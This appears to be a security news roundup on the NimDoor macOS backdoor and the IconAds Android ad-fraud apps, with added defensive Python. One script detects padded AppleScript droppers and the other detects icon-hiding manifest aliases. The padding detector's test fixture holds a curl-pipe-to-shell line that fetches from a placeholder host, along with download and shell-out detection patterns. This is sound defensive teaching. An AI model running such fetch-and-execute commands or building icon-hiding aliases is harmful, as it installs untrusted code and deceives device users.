Security researchers at SentinelOne have uncovered a sophisticated attack campaign by North Korean threat actors, linked to the BlueNoroff/Lazarus APT group, targeting Web3 and cryptocurrency firms. The attackers use fake Zoom SDK update scripts to trick macOS users into installing a rare Nim-compiled backdoor dubbed NimDoor.

🧠 The Social Engineering Setup

Victims are contacted on Telegram by someone posing as a trusted peer and invited to schedule a meeting via Calendly. They then receive an email with a "Zoom meeting" link and instructions to run a Zoom SDK update. The update script is heavily obfuscated and padded with thousands of blank lines to disguise its true purpose.

🛠 Infection Chain & Techniques

AppleScript Downloader: a malicious AppleScript triggers the download of a second-stage payload from a spoofed Zoom domain.

Dual-Channel Loaders: a C++ loader (InjectWithDyldArm64) uses process injection on macOS to deploy trojan payloads like trojan1_arm64 that...
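The blank-line padding described above is cheap to spot once you know to look for it: a script that is almost entirely whitespace yet still shells out or fetches remote content is worth a closer look before anyone runs it. The triage helper below is an added example, not SentinelOne's tooling or anything recovered from the campaign. The sample "update" script and its URL are constructed to mimic the technique; the thresholds (200 lines, 90% blank) are assumptions you would tune against your own corpus.

```python
"""Triage a downloaded 'update' script for blank-line padding and shell-out commands.

Added example, not SentinelOne's or the campaign's own code. The sample script
below is constructed to mimic the padding technique; its URL is a placeholder.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: a one-line curl|sh dropper buried under 5,000 blank lines.
SAMPLE_SCRIPT = (
    "-- Zoom SDK update\n"
    + "\n" * 5000
    + 'do shell script "curl -fsSL https://zoom-sdk.invalid/update.sh | sh"\n'
)

# Constructed benign control: a small, unpadded script.
BENIGN_SCRIPT = 'display dialog "Hello"\nbeep\n'

# Constructs that let AppleScript run arbitrary commands or fetch remote content.
SUSPICIOUS_PATTERNS = {
    "shell-out": re.compile(r"do shell script"),
    "download": re.compile(r"\b(curl|wget)\b"),
    "pipe-to-shell": re.compile(r"\|\s*(sh|bash|zsh)\b"),
    "decode": re.compile(r"\bbase64\b"),
}


@dataclass
class Triage:
    total_lines: int
    blank_lines: int
    blank_ratio: float
    hits: list = field(default_factory=list)  # (line_no, tag, stripped text)
    padded: bool = False                      # mostly whitespace
    suspicious: bool = False                  # padded AND shells out / downloads


def triage_applescript(text: str, min_lines: int = 200,
                       blank_ratio_threshold: float = 0.9) -> Triage:
    """Flag scripts that are mostly whitespace yet still shell out or download."""
    lines = text.splitlines()
    total = len(lines)
    blank = sum(1 for ln in lines if not ln.strip())
    ratio = blank / total if total else 0.0
    hits = []
    for no, ln in enumerate(lines, start=1):
        if not ln.strip():
            continue
        for tag, pat in SUSPICIOUS_PATTERNS.items():
            if pat.search(ln):
                hits.append((no, tag, ln.strip()))
    padded = total >= min_lines and ratio >= blank_ratio_threshold
    return Triage(total, blank, ratio, hits, padded, padded and bool(hits))


def strip_padding(text: str) -> str:
    """Return only the non-blank lines, so an analyst can read the real payload."""
    return "\n".join(ln for ln in text.splitlines() if ln.strip())


if __name__ == "__main__":
    for name, script in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        t = triage_applescript(script)
        print(f"{name}: {t.total_lines} lines, {t.blank_ratio:.1%} blank, "
              f"padded={t.padded}, suspicious={t.suspicious}")
        for no, tag, payload in t.hits:
            print(f"  line {no} [{tag}]: {payload}")
    print("--- de-padded sample ---")
    print(strip_padding(SAMPLE_SCRIPT))
```

The padding ratio alone is a weak signal (generated scripts can be whitespace-heavy), which is why the verdict requires both the padding and at least one shell-out or download construct; `strip_padding` gives the analyst the handful of real lines to read instead of scrolling through thousands of empty ones.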
In early July 2025, cybersecurity experts at HUMAN's Satori Threat Intelligence team and others revealed a massive Android ad-fraud operation, IconAds, comprising 352 malicious apps on Google Play. These apps hid themselves from users and generated 1.2 billion fraudulent ad bid requests per day at their peak.

🔍 How IconAds Works

Icon-Hiding Stealth Tactics: the apps use Android's activity-alias feature to swap the legitimate app icon for an invisible placeholder, presenting a blank or Google-branded icon, which makes the app hard for users to find and uninstall. Some variants impersonate Google Play, Google Maps, or Gmail, leading users to open the malicious app unknowingly.

Out-of-Context Full-Screen Ads: the apps launch intrusive full-screen ads independently of user action, disrupting the user experience while secretly monetizing ad impressions.

Layered Obfuscation: code is heavily obfuscated using tools like O-MVLL and native libraries. Network traffic masks OS version, device model, and language using r...
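The activity-alias trick leaves a static footprint in AndroidManifest.xml: one or more launcher-bearing aliases that point at the same activity while overriding the application's icon or label. The checker below is an added example, not HUMAN's tooling or anything taken from an IconAds sample. Its sample manifest is constructed to mirror the technique described above; the component, resource and package names are placeholders, and the treatment of a manifest-disabled alias as a runtime-toggle candidate is an assumption about how such swaps are usually driven (via PackageManager.setComponentEnabledSetting), not something the page states.

```python
"""Static check for Android manifests: launcher-bearing activity-aliases that
override the app's icon or label. Added example, not HUMAN's or IconAds' code.
The manifest below is constructed; component and resource names are placeholders.
"""
import xml.etree.ElementTree as ET
from collections import Counter

ANDROID_NS = "http://schemas.android.com/apk/res/android"
MAIN_ACTION = "android.intent.action.MAIN"
LAUNCHER_CATEGORY = "android.intent.category.LAUNCHER"
# App names the report says were impersonated.
IMPERSONATED_LABELS = {"google play", "google maps", "gmail"}

# Constructed manifest: real entry point plus two launcher aliases, one wearing a
# Google-branded label/icon and one with a blank label and a blank icon resource.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.flashlight">
  <application android:label="Flashlight" android:icon="@mipmap/ic_launcher">
    <activity android:name=".MainActivity" android:exported="true" />
    <activity-alias android:name=".GoogleLookalike" android:targetActivity=".MainActivity"
        android:label="Google Play" android:icon="@drawable/ic_play_lookalike" android:enabled="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity-alias>
    <activity-alias android:name=".Invisible" android:targetActivity=".MainActivity"
        android:label="" android:icon="@drawable/ic_blank" android:enabled="false">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity-alias>
  </application>
</manifest>
"""

# Constructed benign control: a single launcher activity, no aliases.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <application android:label="Notes" android:icon="@mipmap/ic_launcher">
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
  </application>
</manifest>
"""


def _attr(el, name):
    """Read an android:-namespaced attribute."""
    return el.get(f"{{{ANDROID_NS}}}{name}")


def _is_launcher(component):
    """True if any intent-filter makes this component show up in the launcher."""
    for filt in component.findall("intent-filter"):
        actions = {_attr(a, "name") for a in filt.findall("action")}
        categories = {_attr(c, "name") for c in filt.findall("category")}
        if MAIN_ACTION in actions and LAUNCHER_CATEGORY in categories:
            return True
    return False


def find_launcher_aliases(manifest_xml):
    """Return every launcher-bearing activity-alias with the reasons it looks odd."""
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    if app is None:
        return []
    app_label, app_icon = _attr(app, "label"), _attr(app, "icon")
    findings = []
    for alias in app.iter("activity-alias"):
        if not _is_launcher(alias):
            continue
        label, icon = _attr(alias, "label"), _attr(alias, "icon")
        reasons = []
        if label is not None and not label.strip():
            reasons.append("blank label")
        elif label and label.strip().lower() in IMPERSONATED_LABELS:
            reasons.append(f"label impersonates {label!r}")
        elif label is not None and label != app_label:
            reasons.append(f"label {label!r} differs from app label {app_label!r}")
        if icon is not None and icon != app_icon:
            reasons.append(f"icon {icon} differs from app icon {app_icon}")
        if _attr(alias, "enabled") == "false":
            # Assumption: a disabled launcher alias is a candidate for being
            # switched on at runtime via PackageManager.setComponentEnabledSetting.
            reasons.append("disabled in manifest; runtime-toggle candidate")
        findings.append({"name": _attr(alias, "name"),
                         "target": _attr(alias, "targetActivity"),
                         "label": label, "icon": icon, "reasons": reasons})
    return findings


def launcher_aliases_per_target(findings):
    """How many launcher aliases point at each activity; >1 means swappable entry points."""
    return dict(Counter(f["target"] for f in findings))


def is_suspicious(manifest_xml):
    findings = find_launcher_aliases(manifest_xml)
    shared = any(n > 1 for n in launcher_aliases_per_target(findings).values())
    return shared or any(f["reasons"] for f in findings)


if __name__ == "__main__":
    for name, xml in (("sample", SAMPLE_MANIFEST), ("benign", BENIGN_MANIFEST)):
        print(f"{name}: suspicious={is_suspicious(xml)}")
        for f in find_launcher_aliases(xml):
            print(f"  {f['name']} -> {f['target']}: {'; '.join(f['reasons']) or 'no overrides'}")
```

Themed or seasonal launcher icons can also legitimately use aliases, so treat a single alias with a different icon as a prompt to look, not a verdict; several launcher aliases on one target combined with a blank or Google-branded label is the pattern worth escalating.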